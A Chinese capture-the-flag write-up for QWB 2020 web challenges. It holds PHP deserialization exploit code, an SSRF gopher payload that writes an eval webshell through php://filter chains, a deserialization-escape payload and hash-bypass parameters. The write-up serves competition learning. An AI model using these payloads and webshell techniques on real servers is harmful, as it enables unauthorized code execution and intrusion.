zoukankan      html  css  js  c++  java
  • 强网杯2020 writeup

    原文地址:http://phoebe233.cn/?p=242

    被二进制爷爷们带飞Orz

    Web

    half_infiltration

    首先反序列化,由于print之后无论走哪都会有ob_end_clean(),永远也不会输出,所以尝试输出之后让他报错来绕过

    图片

    这样global$$this就会输出并报错

    图片

    传入两个User,一个输出,一个报错绕过ob_end_clean()

    <?php
    $flag='flag{aaaa}';
    class Pass
    {
        function read()
        {
            ob_start();
            global $result;
            print $result;
        }
    }
    class User
    {
        public $age,$sex,$num;
        function __destruct()
        {
            $student = $this->age;
            $boy = $this->sex;
            $a = $this->num;
    		$student->$boy();
    		
        if(!(is_string($a)) ||!(is_string($boy)) || !(is_object($student)))
        {
            ob_end_clean();
            exit();
        }
        global $$a;
        $result=$GLOBALS['flag'];
            //ob_end_clean();
        }
    }
    if (isset($_GET['x'])) {
        unserialize($_GET['x']);
    } 
    $a=new Pass();
    $b=new User();
    $c=new User();
    $c->age=$a;
    $c->sex="read";
    $c->num="this";
    $b->age=$a;
    $b->sex="read";
    $b->num='result';
    echo urlencode(serialize([$b,$c]));
    

    读到ssrf.php
    图片

    内网端口探测为40000,内网服务:

    图片

    源码处看到form表单,题目告知有uploads文件夹,猜测是文件上传处,发现phpsessid会创建一个文件夹,然后想写shell时发现有过滤,file这里可以用二次url绕一些字符,然后大小写绕base64过滤,content文件内容也有过滤,还把PD9给ban了,考虑用phpfilter组合过滤器绕

    图片

    生成gopher打40000端口

    gopher://127.0.0.1:40000/_POST%2520/index.php%2520HTTP/1.1%250AHost%253A%2520127.0.0.1%250ACookie%253A%2520PHPSESSID%253Dbv2afbkkbbpgkio8tjmai40ob7%250AContent-Length%253A%2520174%250AContent-Type%253A%2520application/x-www-form-urlencoded%250AConnection%253A%2520close%250d%250A%250Afile%253Dphp%253A//filter/%25252577rite%253Dstring.rot13%257Cconvert.Base64-decode%257Cconvert.iconv.utf-7.utf-8/resource%253D1.php%2526content%253DK0FEdz9waHAgZXZhbCgrQUNRQVh3LUdFVCtBRnMtMCtBRjApK0FEcz8rQUQ0LQ
    

    命令执行需要二次编码
    图片

    这过滤也是挺狠

    图片

    强网先锋

    web辅助

    反序列化逃逸,安恒月赛都有类似的题了,没意思

    class player{
        protected $user;
        protected $pass;
        protected $admin;
        public function __construct($user, $pass, $admin = 0){
            $this->user = $user;
            $this->pass = $pass;
            $this->admin = $admin;
        }
        public function get_admin(){
            return $this->admin;
        }
    }
    
    class topsolo{
        protected $name;
        public function __construct($name = 'Riven'){
            $this->name = $name;
        }
    
        public function TP(){
            if (gettype($this->name) === "function" or gettype($this->name) === "object"){
                $name = $this->name;
                $name();
            }
        }
        public function __wakeup(){
            $this->TP();
        }
    }
    class midsolo{
        protected $name;
        public function __construct($name){
            $this->name = $name;
        }
        public function __wakeup(){
            if ($this->name !== 'Yasuo'){
                $this->name = 'Yasuo';
                echo "No Yasuo! No Soul!
    ";
            }
        }
        public function __invoke(){
            $this->Gank();
        }
        public function Gank(){
            if (stristr($this->name, 'Yasuo')){
                echo "Are you orphan?
    ";
            }
            else{
                echo "Must Be Yasuo!
    ";
            }
        }
    }
    class jungle{
        protected $name = "";
        public function __construct($name = "Lee Sin"){
            $this->name = $name;
        }
        public function KS(){
            phpinfo();
        }
        public function __toString(){
            $this->KS();  
            return "";  
        }
    }
    function read($data){
        $data = str_replace('*', chr(0)."*".chr(0), $data);
        return $data;
    }
    function write($data){
        $data = str_replace(chr(0)."*".chr(0), '*', $data);
        return $data;
    }
    $d=new jungle(NULL);
    $c=new midsolo($d);
    $b=new topsolo($c);
    $payload=(serialize($b));
    $a="\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0";
    //$username='**********************';
    $b='";s:7:"0*0pass";s:0:"";s:8:"0*0admin";'.$payload;
    echo $b."
    ";
    echo read(write(serialize(new player($a,$b))))."
    ";
    

    payload

    ?username=**********************&password=";s:7:"%00*%00pass";s:0:"";s:8:"%00*%00admin";O:7:"topsolo":2:{S:7:"0*06e616d65";O:7:"midsolo":1:{S:7:"0*06e616d65";O:6:"jungle":1:{S:7:"0*06e616d65";N
    

    图片

    funhash

    ?hash1=0e251288019&hash2[]=1&hash3[]=2&hash4=ffifdyop
    

    图片

    主动

    cat f*

  • 相关阅读:
    USACO Sabotage
    USACO Telephone Lines
    NOIP 2012 借教室
    洛谷 P1902 刺杀大使
    VIJOS-P1450 包裹快递
    JDOJ 1770 埃及分数
    USACO Monthly Expense
    7.modifier插件的自定义和使用
    6.function自定义插件的方法和使用
    5.Smart使用内置函数或者自定义函数
  • 原文地址:https://www.cnblogs.com/W4nder/p/13556417.html
Copyright © 2011-2022 走看看